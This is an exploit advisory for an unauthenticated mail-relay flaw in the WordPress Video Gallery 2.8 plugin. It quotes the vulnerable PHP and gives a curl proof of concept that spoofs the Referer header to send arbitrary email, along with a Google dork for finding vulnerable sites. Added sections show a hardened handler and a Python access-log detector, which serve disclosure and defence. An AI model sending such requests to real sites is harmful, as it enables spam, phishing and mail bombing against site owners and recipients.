WordPress Plugin Video Gallery 2.8 – Arbitrary Mail Relay

  • Author: Claudio Viviani
    Date: 2015-05-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37106/
  • ######################
    
    # Exploit Title : WordPress Video Gallery 2.8 Unprotected Mail Page
    
    # Exploit Author : Claudio Viviani
    
    # Website Author: http://www.homelab.it
    http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
    
    # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
    
    # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
    
    # Dork Google: index of "contus-video-gallery"
    
    
    # Date : 2015-04-05
    
    # Tested on : Windows 7 / Mozilla Firefox
    #             Linux / Mozilla Firefox
    
    ######################
    
    # Description
    
     WordPress Video Gallery 2.8 suffers from an unprotected mail page.
     
     The flaw can be abused for denial of service, phishing, mail bombing and spam.
     
     The "email" AJAX action is registered for unauthenticated (nopriv) visitors as well as logged-in users, so any guest can call it (/contus-video-gallery/hdflvvideoshare.php):
     
     /**
      * Email function
      */
     add_action( 'wp_ajax_email', 'email_function' );
     add_action( 'wp_ajax_nopriv_email', 'email_function' );

     function email_function() {
         require_once( dirname( __FILE__ ) . '/email.php' );
         die();
     }
    
     Any user can therefore send email through /contus-video-gallery/email.php to any recipient.
     
     The variables used to send emails are:
     
     $to              = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
     $from            = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
     $url             = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
     $subject         = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
     $message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
     $title           = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
     $referrer        = parse_url( $_SERVER['HTTP_REFERER'] );
     $referrer_host   = $referrer['scheme'] . '://' . $referrer['host'];
     $pageURL         = 'http';
     
     The plugin assumes that if the Referer header sent by the client matches the site's own URL, it is safe to send the email:
     
     if ( $referrer_host === $pageURL ) {
         $headers  = "MIME-Version: 1.0" . "\r\n";
         $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
         $headers .= "From: " . "<" . $from . ">\r\n";
         $headers .= "Reply-To: " . $from . "\r\n";
         $headers .= "Return-path: " . $from;
         $username = explode( '@', $from );
         $username = ucfirst( $username['0'] );
         $subject  = $username . ' has shared a video with you.';
         $emailtemplate_path = plugin_dir_url( __FILE__ ) . 'front/emailtemplate/Emailtemplate.html';
         $message  = file_get_contents( $emailtemplate_path );
         $message  = str_replace( '{subject}', $subject, $message );
         $message  = str_replace( '{message}', $message_content, $message );
         $message  = str_replace( '{videourl}', $url, $message );
         $message  = str_replace( '{username}', $username, $message );
         if ( @mail( $to, $title, $message, $headers ) ) {
             echo 'success=sent';
         } else {
             echo 'success=error';
         }
     } else {
         echo 'success=error';
     }
     
     The Referer header is supplied by the client, so an attacker can easily set it to whatever value passes this check.
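     As an added example (not part of the original advisory and not the plugin's own code), the following shows how the same AJAX handler can be written so that the decision to send mail no longer depends on the client-controlled Referer header: the hook is registered only for authenticated users (no wp_ajax_nopriv_ hook), the request must carry a WordPress nonce, inputs are validated with WordPress helpers, the shared URL must point at this site, a per-user rate limit caps the volume, and the From address is fixed to the site's own address instead of being taken from the request. The action name cvg_share_video, the function name cvg_secure_email_handler, the POST field "nonce" and the limit of 10 mails per hour are assumptions made for this example.

```php
<?php
// Added hardening example, not the plugin's code. The hook name, handler
// name, nonce action, POST field names and rate limit are assumptions.

// Register for logged-in users only. Without a wp_ajax_nopriv_ hook,
// unauthenticated POSTs to admin-ajax.php?action=cvg_share_video get "0".
add_action( 'wp_ajax_cvg_share_video', 'cvg_secure_email_handler' );

function cvg_secure_email_handler() {
    // 1. Nonce check: the nonce is bound to the user session and the action,
    //    unlike the Referer header, which any client can set freely.
    //    check_ajax_referer() dies with a 403 if the nonce is missing or invalid.
    check_ajax_referer( 'cvg_share_video', 'nonce' );

    // 2. Capability check: only users allowed to read content may share it.
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Validate and sanitize inputs with WordPress helpers.
    $to   = isset( $_POST['to'] )   ? sanitize_email( wp_unslash( $_POST['to'] ) )           : '';
    $url  = isset( $_POST['url'] )  ? esc_url_raw( wp_unslash( $_POST['url'] ) )             : '';
    $note = isset( $_POST['Note'] ) ? sanitize_textarea_field( wp_unslash( $_POST['Note'] ) ) : '';

    if ( ! is_email( $to ) || '' === $url ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    // Only links back to this site may be shared, so the form cannot be used
    // to mail arbitrary (phishing) URLs to arbitrary recipients.
    if ( wp_parse_url( $url, PHP_URL_HOST ) !== wp_parse_url( home_url(), PHP_URL_HOST ) ) {
        wp_send_json_error( 'url must be on this site', 400 );
    }

    // 4. Per-user rate limit (transient-based) against mail bombing / spam.
    $key   = 'cvg_share_count_' . get_current_user_id();
    $count = (int) get_transient( $key );
    if ( $count >= 10 ) {
        wp_send_json_error( 'rate limited', 429 );
    }
    set_transient( $key, $count + 1, HOUR_IN_SECONDS );

    // 5. From/Reply-To come from the site configuration, not from the request;
    //    the sender name is the authenticated user's display name.
    $user    = wp_get_current_user();
    $from    = get_option( 'admin_email' );
    $headers = array(
        'Content-Type: text/html; charset=UTF-8',
        'From: ' . get_bloginfo( 'name' ) . ' <' . $from . '>',
    );
    $subject = sprintf( '%s has shared a video with you', $user->display_name );
    $body    = sprintf(
        '<p>%s</p><p><a href="%s">%s</a></p>',
        esc_html( $note ),
        esc_url( $url ),
        esc_html( $url )
    );

    if ( wp_mail( $to, $subject, $body, $headers ) ) {
        wp_send_json_success( 'sent' );
    }
    wp_send_json_error( 'mail failed', 500 );
}

// The page that renders the share form must embed the nonce so the front-end
// script can POST it back as the "nonce" field:
//   wp_nonce_field( 'cvg_share_video', 'nonce' );
```

     The nonce replaces the Referer comparison as the proof that the request originated from a form this site served to this user; the capability check and the missing nopriv hook together close the guest access path, and the fixed From header removes the sender spoofing that made the original endpoint useful for phishing.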
    
    ######################
    
    # PoC
    
     curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
     -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email
    
     The curl switch "-e" sets a spoofed Referer header.
    
    # HTTP Response
    
    success=sent
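     Added detection example (not part of the original advisory): the PoC above is a single POST to admin-ajax.php?action=email, and the mail bombing and spam abuse the advisory mentions is the same request repeated in volume. The script below parses combined-format web server access log lines, picks out POSTs to that action, and flags any client IP that sends more than a threshold of them inside a sliding time window. The log lines, IP addresses, threshold and window size are constructed for this example.

```python
"""Added detection example (not part of the original advisory).

Scans combined-format (Apache/nginx) access log lines for POST requests to
/wp-admin/admin-ajax.php?action=email and flags client IPs that issue more
than `threshold` such requests within any `window`-second span, the pattern
of the mail-bombing / spam abuse described in the advisory. The sample log
lines below are constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def is_email_action(rec):
    """True for POST /wp-admin/admin-ajax.php?action=email (the vulnerable hook)."""
    if rec["method"] != "POST":
        return False
    parts = urlsplit(rec["path"])
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    return parse_qs(parts.query).get("action") == ["email"]


def find_mail_abusers(lines, threshold=5, window=60):
    """Return {ip: peak_count} for IPs that exceed `threshold` email-action
    POSTs within any `window`-second span (per-IP deque as a sliding window).
    The Referer is deliberately ignored: as the advisory shows, it is spoofable."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_email_action(rec):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) > threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


# Constructed sample: one legitimate-looking share, one GET (not the vulnerable
# path), and seven POSTs from a single IP within 30 seconds.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/May/2015:10:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=email HTTP/1.1" 200 12 "http://127.0.0.1" "curl/7.38.0"',
    '203.0.113.9 - - [26/May/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=email HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
] + [
    '203.0.113.5 - - [26/May/2015:10:00:%02d +0000] "POST /wp-admin/admin-ajax.php?action=email HTTP/1.1" 200 12 "http://127.0.0.1" "curl/7.38.0"' % s
    for s in range(5, 40, 5)
]

if __name__ == "__main__":
    for ip, count in find_mail_abusers(SAMPLE_LOG).items():
        print("ALERT: %s sent %d email-action POSTs within the window" % (ip, count))
```

     In production the same logic runs over the live access log (or a SIEM query on the same fields); the threshold should be set from the site's normal share volume, and a hit is a reason to block the source and to check the mail queue for outgoing messages with attacker-chosen From addresses.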
    
    # PoC Video
    
    http://youtu.be/qgOGPm1-tNc
     
    
    #######################
    
    Discovered By : Claudio Viviani
    http://www.homelab.it
    http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
    http://ffhd.homelab.it (Free Fuzzy Hashes Database)
    				
    info@homelab.it
    homelabit@protonmail.ch
    
    https://www.facebook.com/homelabit
    https://twitter.com/homelabit
    https://plus.google.com/+HomelabIt1/
    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
    
    #####################